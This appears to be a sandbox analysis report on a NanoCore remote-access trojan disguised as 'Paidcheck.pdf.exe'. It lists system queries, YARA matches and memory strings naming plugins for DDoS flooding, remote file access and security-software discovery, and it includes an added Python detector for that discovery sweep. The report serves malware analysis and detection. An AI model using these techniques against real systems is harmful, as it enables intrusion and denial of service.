Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\RegAsm.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (3 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (3 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (3 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (2 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (2 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\RegAsm.exe VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_06CC02F0 GetSystemTimes, 10_2_06CC02F0
Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
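The three ExecQuery lines above are the NanoCore security-software sweep: one WQL query per ROOT\SecurityCenter2 product class (AntiVirusProduct, AntiSpywareProduct, FirewallProduct), which is what the matrix below scores as Security Software Discovery (T1518.001). The query text has the same shape as the Operation field of Microsoft-Windows-WMI-Activity trace events, so it can be hunted for on endpoints that forward that channel. The detector below is an added example, not code from the report or from the sandbox vendor: it parses the Operation string, keeps only SecurityCenter2 product-class queries, drops images on an allowlist, and then raises the confidence when one process sweeps all three classes. The event records, the process IDs and the inventory-agent path on the allowlist are constructed for the example; the RegAsm.exe path is the one the report shows.

```python
"""Added example: flag ROOT\\SecurityCenter2 product-class sweeps in WMI-Activity style events."""
from __future__ import annotations

import re

# Operation text as the WMI-Activity provider writes it; namespace and WQL are split on " : ".
_OP_RE = re.compile(r"IWbemServices::ExecQuery\s*-\s*(?P<ns>[^:]+?)\s*:\s*(?P<wql>.+)$", re.IGNORECASE)
_FROM_RE = re.compile(r"\bFROM\s+(?P<cls>\w+)", re.IGNORECASE)

# The three product classes NanoCore enumerates (compared case-insensitively).
SECURITYCENTER_CLASSES = frozenset({"antivirusproduct", "antispywareproduct", "firewallproduct"})

# Constructed sample events (not from the report): pid 1234 models the RegAsm.exe
# sweep, pid 5678 a hypothetical inventory agent that legitimately asks for AV state.
SAMPLE_EVENTS = [
    {"ClientProcessId": 1234, "Image": r"C:\Users\user\AppData\Local\Temp\RegAsm.exe",
     "Operation": r"Start IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct"},
    {"ClientProcessId": 1234, "Image": r"C:\Users\user\AppData\Local\Temp\RegAsm.exe",
     "Operation": r"Start IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct"},
    {"ClientProcessId": 1234, "Image": r"C:\Users\user\AppData\Local\Temp\RegAsm.exe",
     "Operation": r"Start IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct"},
    {"ClientProcessId": 1234, "Image": r"C:\Users\user\AppData\Local\Temp\RegAsm.exe",
     "Operation": r"Start IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process"},
    {"ClientProcessId": 5678, "Image": r"C:\Program Files\Contoso\InventoryAgent.exe",
     "Operation": r"Start IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct"},
]
ALLOWED_IMAGES = [r"C:\Program Files\Contoso\InventoryAgent.exe"]   # hypothetical allowlist


def parse_exec_query(operation: str) -> tuple[str, str] | None:
    """Return (normalised namespace, queried class) for an ExecQuery operation, else None."""
    m = _OP_RE.search(operation)
    if not m:
        return None
    f = _FROM_RE.search(m["wql"])
    if not f:
        return None
    ns = m["ns"].strip().lower().replace("/", "\\")   # ROOT/x and root\x are the same namespace
    return ns, f["cls"]


def find_security_software_discovery(events, allowed_images) -> list[dict]:
    """Keep SecurityCenter2 product-class queries from images outside the allowlist."""
    allowed = {a.lower() for a in allowed_images}
    hits = []
    for ev in events:
        parsed = parse_exec_query(ev.get("Operation", ""))
        if parsed is None:
            continue
        ns, cls = parsed
        if ns != "root\\securitycenter2" or cls.lower() not in SECURITYCENTER_CLASSES:
            continue
        if ev["Image"].lower() in allowed:
            continue
        hits.append({"pid": ev["ClientProcessId"], "image": ev["Image"], "class": cls})
    return hits


def full_sweeps(hits) -> set[int]:
    """PIDs that queried all three classes: the high-confidence NanoCore pattern."""
    seen: dict[int, set[str]] = {}
    for h in hits:
        seen.setdefault(h["pid"], set()).add(h["class"].lower())
    return {pid for pid, classes in seen.items() if classes >= SECURITYCENTER_CLASSES}


if __name__ == "__main__":
    found = find_security_software_discovery(SAMPLE_EVENTS, ALLOWED_IMAGES)
    for h in found:
        print(f"pid {h['pid']} {h['image']} -> {h['class']}")
    print("full sweeps:", sorted(full_sweeps(found)))
```

Two caveats when using this for real: ROOT\SecurityCenter2 exists only on client SKUs, so the rule is silent on Windows Server, and legitimate RMM and inventory agents do query AntiVirusProduct, which is why the allowlist exists and why the three-class sweep is the stronger signal. The second thing worth checking in this report is the image path itself: the genuine RegAsm.exe lives under C:\Windows\Microsoft.NET\Framework\, so a copy running from %TEMP% is suspicious before it issues a single query.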

Stealing of Sensitive Information:

Yara detected Nanocore RAT
Source: Yara match | File source: 10.2.RegAsm.exe.5f60000.23.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.RegAsm.exe.3c3dc19.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.RegAsm.exe.3c395f0.11.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.RegAsm.exe.5f64629.22.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.RegAsm.exe.5f60000.23.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.RegAsm.exe.3c395f0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.RegAsm.exe.3c24c35.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Paidcheck.pdf.exe.3eceb18.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.RegAsm.exe.3d596b5.14.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.RegAsm.exe.3d4d481.12.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Paidcheck.pdf.exe.3e36bd0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.RegAsm.exe.3d6dce2.13.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Paidcheck.pdf.exe.3ce1990.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.486028172.0000000003C21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.480862241.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.486159057.0000000003C9E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORY

Remote Access Functionality:

Detected Nanocore Rat
Source: Paidcheck.pdf.exe, 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe | String found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 0000000A.00000002.480862241.0000000002BD1000.00000004.00000001.sdmp | String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegAsm.exe, 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp | String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp | String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp | String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_M